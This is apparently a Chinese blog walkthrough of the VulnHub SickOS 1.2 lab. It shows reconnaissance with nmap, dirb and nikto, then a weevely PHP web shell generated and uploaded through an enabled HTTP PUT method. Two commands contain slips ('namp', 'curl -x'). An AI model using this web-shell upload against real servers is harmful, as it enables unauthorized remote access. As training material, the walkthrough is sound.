综合实战第一章-PUT漏洞实战


综合实战第一章

PUT漏洞实战

环境准备

本次环境使用的是vulnhub靶场里面的sickos:1.2

靶场下载地址:https://www.vulnhub.com/entry/sickos-12,144/

攻击机:kali 192.168.3.134

靶机:sickos 192.168.3.158

信息搜集

又是枯燥的信息搜集

namp -p- -A 192.168.3.158

image-20220426205642413

开放了80端口和22号端口

访问80端口

image-20220426205725119

没啥好找的,用dirb和nikto扫一下

dirb http://192.168.3.158
nikto -h 192.168.3.158

image-20220426205907908

image-20220426205924146

找到了一个/test/目录,进去看看吧

image-20220426221610553

用owasp-zap扫描一下

owasp-zap

image-20220426222532834

也没有啥

可以用curl扫一下

curl -x -v OPTIONS http://192.168.3.158/test

image-20220426222829443

发现支持PUT

漏洞利用

可以利用火狐插件进行上传

首先准备好一个webshell(这里使用weevely)

weevely generate 123456 /root/shell.php

然后打开火狐,使用扩展RESTClient

把webshell扔进去

image-20220426224415603

测试一下

image-20220426224452282

上去了,连一下试试

image-20220426224553668

成了,剩下就是提权!结束!


文章作者: Broken-year
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
  目录